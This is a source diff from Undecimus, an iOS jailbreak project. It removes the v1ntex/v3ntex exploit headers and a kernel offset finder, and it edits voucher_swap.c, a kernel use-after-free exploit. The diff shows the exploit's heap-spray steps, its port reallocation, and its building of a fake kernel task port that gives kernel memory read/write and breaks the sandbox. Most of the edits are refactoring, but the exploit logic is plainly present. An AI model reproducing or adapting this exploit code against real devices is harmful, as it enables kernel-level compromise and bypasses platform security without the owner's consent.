-//  Copyright © 2019 tihmstar. All rights reserved.
-//
-
-#ifndef v1ntex_exploit_h
-#define v1ntex_exploit_h
-#include "v1ntex_offsets.h"
-#include <mach/mach_types.h>
-#include <common.h>
-
-typedef kern_return_t (*v1ntex_cb_t)(task_t kernel_task, kptr_t kbase, void* data);
-int v1ntex(v1ntex_cb_t callback, void* cb_data, v1ntex_offsets* v1ntex_offs);
-
-#endif /* v1ntex_exploit_h */

Undecimus/source/v1ntex_offsets.h

@@ -1,39 +0,0 @@
-//
-//  v1ntex_offsets.h
-//  Undecimus
-//
-//  Created by Pwn20wnd on 2/7/19.
-//  Copyright © 2019 Pwn20wnd. All rights reserved.
-//
-
-#ifndef v1ntex_offsets_h
-#define v1ntex_offsets_h
-
-#include <common.h>
-#include <stdint.h>
-
-typedef struct {
-    kptr_t offset_zone_map;
-    kptr_t offset_kernel_map;
-    kptr_t offset_kernel_task;
-    kptr_t offset_realhost;
-    kptr_t offset_bzero;
-    kptr_t offset_bcopy;
-    kptr_t offset_copyin;
-    kptr_t offset_copyout;
-    kptr_t offset_ipc_port_alloc_special;
-    kptr_t offset_ipc_kobject_set;
-    kptr_t offset_ipc_port_make_send;
-    kptr_t offset_rop_ldr_r0_r0_0xc;
-    kptr_t offset_chgproccnt;
-    kptr_t offset_kauth_cred_ref;
-    kptr_t offset_OSSerializer_serialize;
-} v1ntex_offsets;
-
-#ifdef __cplusplus
-extern "C"
-#endif
-    v1ntex_offsets*
-    get_v1ntex_offsets(const char* filename);
-
-#endif /* v1ntex_offsets_h */

Undecimus/source/v1ntex_offsets.mm

@@ -1,45 +0,0 @@
-//
-//  v1ntex_offsets.mm
-//  Undecimus
-//
-//  Created by Pwn20wnd on 2/7/19.
-//  Copyright © 2019 Pwn20wnd. All rights reserved.
-//
-
-#include "v1ntex_offsets.h"
-#include <liboffsetfinder64/liboffsetfinder64.hpp>
-
-static v1ntex_offsets v1ntex_offs;
-
-extern "C" v1ntex_offsets* get_v1ntex_offsets(const char* filename)
-{
-    LOG("Initializing offsetfinder64...");
-    tihmstar::offsetfinder64 fi(filename);
-    LOG("Successfully initialized offsetfinder64.");
-    LOG("Finding offsets for v1ntex with liboffsetfinder64...");
-    try {
-        v1ntex_offs.offset_zone_map = (kptr_t)fi.find_zone_map();
-        v1ntex_offs.offset_kernel_map = (kptr_t)fi.find_kernel_map();
-        v1ntex_offs.offset_kernel_task = (kptr_t)fi.find_kernel_task();
-        v1ntex_offs.offset_realhost = (kptr_t)fi.find_realhost();
-        v1ntex_offs.offset_bzero = (kptr_t)fi.find_bzero();
-        v1ntex_offs.offset_bcopy = (kptr_t)fi.find_bcopy();
-        v1ntex_offs.offset_copyin = (kptr_t)fi.find_copyin();
-        v1ntex_offs.offset_copyout = (kptr_t)fi.find_copyout();
-        v1ntex_offs.offset_ipc_port_alloc_special = (kptr_t)fi.find_ipc_port_alloc_special();
-        v1ntex_offs.offset_ipc_kobject_set = (kptr_t)fi.find_ipc_kobject_set();
-        v1ntex_offs.offset_ipc_port_make_send = (kptr_t)fi.find_ipc_port_make_send();
-        v1ntex_offs.offset_rop_ldr_r0_r0_0xc = (kptr_t)fi.find_rop_ldr_x0_x0_0x10();
-        v1ntex_offs.offset_chgproccnt = (kptr_t)fi.find_chgproccnt();
-        v1ntex_offs.offset_kauth_cred_ref = (kptr_t)fi.find_kauth_cred_ref();
-        v1ntex_offs.offset_OSSerializer_serialize = (kptr_t)fi.find_osserializer_serialize();
-        LOG("Successfully found offsets for v1ntex with offsetfinder64.");
-        return &v1ntex_offs;
-    } catch (tihmstar::exception& e) {
-        LOG("Failed to find offsets for v1ntex with offsetfinder64 with a non-fatal error. %d (%s).", e.code(), e.what());
-        return NULL;
-    } catch (std::exception& e) {
-        LOG("Failed to find offsets for v1ntex with offsetfinder64 with a fatal error. %s.", e.what());
-        return NULL;
-    }
-}

Undecimus/source/v3ntex_exploit.h

@@ -1,18 +0,0 @@
-//
-//  exploit.h
-//  v3ntex
-//
-//  Created by tihmstar on 23.01.19.
-//  Copyright © 2019 tihmstar. All rights reserved.
-//
-
-#ifndef exploit_h
-#define exploit_h
-#include <common.h>
-#include <mach/mach_types.h>
-
-typedef kern_return_t (*v3ntex_cb_t)(task_t tfp0, kptr_t kbase, void* data);
-
-int v3ntex(v3ntex_cb_t callback, void* cb_data);
-
-#endif /* exploit_h */

Undecimus/source/voucher_swap.c

@@ -18,6 +18,7 @@
 #include "mach_vm.h"
 #include "parameters.h"
 #include "platform.h"
+#include "common.h"
 
 
 // ---- Global parameters -------------------------------------------------------------------------
@@ -194,7 +195,7 @@ voucher_spray_free(mach_port_t *voucher_ports, size_t count) {
 			mach_port_deallocate(mach_task_self(), voucher_ports[i]);
 		}
 	}
-	free(voucher_ports);
+	SafeFreeNULL(voucher_ports);
 }
 
 // ---- Helpers -----------------------------------------------------------------------------------
@@ -665,7 +666,7 @@ stage3_init(uint64_t ipc_space_kernel, uint64_t kernel_map) {
 	fake_port = MACH_PORT_NULL;
 	success = true;
 fail_1:
-	free(data);
+	SafeFreeNULL(data);
 fail_0:
 	return success;
 }
@@ -762,7 +763,7 @@ voucher_swap() {
 
 	// 2. Create some pipes so that we can spray pipe buffers later. We'll be limited to 16 MB
 	// of pipe memory, so don't bother creating more.
-	pipe_buffer_size = (page_size == 0x4000 ? 16384 : 4096);
+    pipe_buffer_size = 16384;
 	size_t pipe_count = 16 * MB / pipe_buffer_size;
 	increase_file_limit();
 	int *pipefds_array = create_pipes(&pipe_count);
@@ -788,7 +789,7 @@ voucher_swap() {
 
 	// 4. Spray our pipe buffers. We're hoping that these land contiguously right after the
 	// ports.
-	assert(pipe_buffer_size == (page_size == 0x4000 ? 16384 : 4096));
+	assert(pipe_buffer_size == 16384);
 	pipe_buffer = calloc(1, pipe_buffer_size);
 	assert(pipe_buffer != NULL);
 	assert(pipe_count <= IO_BITS_KOTYPE + 1);
@@ -822,13 +823,13 @@ voucher_swap() {
 	INFO("created %zu vouchers", voucher_spray_count);
 	mach_port_t uaf_voucher_port = voucher_ports[uaf_voucher_index];
 
-	// 6. Spray 10% of memory in kalloc.1024 that we can free later to
+	// 6. Spray 15% of memory in kalloc.1024 that we can free later to
 	// prompt gc. We'll reuse some of the early ports from the port spray above for this.
-    const size_t gc_spray_size = (kCFCoreFoundationVersionNumber >= 1535.12 ? 0.15 : 0.10) * platform.memory_size;
+    const size_t gc_spray_size = (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0 ? 0.15 : 0.10) * platform.memory_size;
 	printf("Spray size: %ld\n", gc_spray_size);
 	mach_port_t *gc_ports = filler_ports;
-	size_t gc_port_count = 500;		// Use at most 500 ports for the spray.
-    sprayed_size = kalloc_spray_size(gc_ports, &gc_port_count, (kCFCoreFoundationVersionNumber >= 1535.12 ? 768 : 300) + 1, 1024, gc_spray_size);;
+	size_t gc_port_count = 500;        // Use at most 500 ports for the spray.
+    sprayed_size = kalloc_spray_size(gc_ports, &gc_port_count, (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0 ? 768 : 300) + 1, 1024, gc_spray_size);
 	INFO("sprayed %zu bytes to %zu ports in kalloc.%u", sprayed_size, gc_port_count, 1024);
     
 	// 7. Stash a pointer to an ipc_voucher in the thread's ith_voucher field and then remove
@@ -844,7 +845,7 @@ voucher_swap() {
 	// We will reallocate the voucher to kalloc.32768, which is a convenient size since it lets
 	// us very easily predict what offsets in the allocation correspond to which fields of the
 	// voucher.
-	assert(BLOCK_SIZE(ipc_voucher) == (page_size == 0x4000 ? 16384 : 4096));
+	assert(BLOCK_SIZE(ipc_voucher) == 16384);
 	const size_t ool_port_spray_kalloc_zone = 32768;
 	const size_t ool_port_count = ool_port_spray_kalloc_zone / sizeof(uint64_t);
 	mach_port_t *ool_ports = calloc(ool_port_count, sizeof(mach_port_t));
@@ -881,16 +882,16 @@ voucher_swap() {
 	// kalloc.32768 zone. We need to do this slowly in order to force a zone garbage
 	// collection. Spraying 17% of memory (450 MB on the iPhone XR) with OOL ports should be
 	// plenty.
-    const size_t ool_ports_spray_size = (kCFCoreFoundationVersionNumber >= 1535.12 ? 0.25 : 0.085) * platform.memory_size;
+    const size_t ool_ports_spray_size = (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0 ? 0.25 : 0.085) * platform.memory_size;
 	mach_port_t *ool_holding_ports = gc_ports + gc_port_count;
-	size_t ool_holding_port_count = 500;
+	size_t ool_holding_port_count = 500;    // Use at most 500 ports for the spray.
 	sprayed_size = ool_ports_spray_size_with_gc(ool_holding_ports, &ool_holding_port_count,
 			message_size_for_kalloc_size(512),
 			ool_ports, ool_port_count, MACH_MSG_TYPE_MAKE_SEND,
 			ool_ports_spray_size);
 	INFO("sprayed %zu bytes of OOL ports to %zu ports in kalloc.%zu",
 			sprayed_size, ool_holding_port_count, ool_port_spray_kalloc_zone);
-	free(ool_ports);
+	SafeFreeNULL(ool_ports);
 
 	// 12. Once we've reallocated the voucher with an OOL ports allocation, the iv_refs field
 	// will overlap with the lower 32 bits of the pointer to base_port. If base_port's address
@@ -1000,9 +1001,9 @@ voucher_swap() {
 	// ports, and close the sprayed pipes.
 	thread_terminate(thread);
 	destroy_ports(filler_ports, filler_port_count);
-	free(filler_ports);
+	SafeFreeNULL(filler_ports);
 	close_pipes(pipefds_array, pipe_count);
-	free(pipefds_array);
+	SafeFreeNULL(pipefds_array);
 
 	// 17. Use mach_port_request_notification() to put a pointer to an array containing
 	// base_port in our port's ip_requests field.
@@ -1118,6 +1119,8 @@ voucher_swap() {
 
 	// 26. Build a fake kernel task port that allows us to read and write kernel memory.
 	stage2_init(ipc_space_kernel, kernel_map);
+    extern void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0);
+    prepare_for_rw_with_fake_tfp0(kernel_task_port);
 
 	// 27. Alright, now kernel_read() and kernel_write() should work, so let's build a safer
 	// kernel_task port. This also cleans up fake_port so that we (hopefully) won't panic on
@@ -1136,7 +1139,7 @@ voucher_swap() {
 
 	// 29. And finally, deallocate the remaining unneeded (but non-corrupted) resources.
 	pipe_close(pipefds);
-	free(pipe_buffer);
+	SafeFreeNULL(pipe_buffer);
 	mach_port_destroy(mach_task_self(), base_port);
     
     // 30. Unsandbox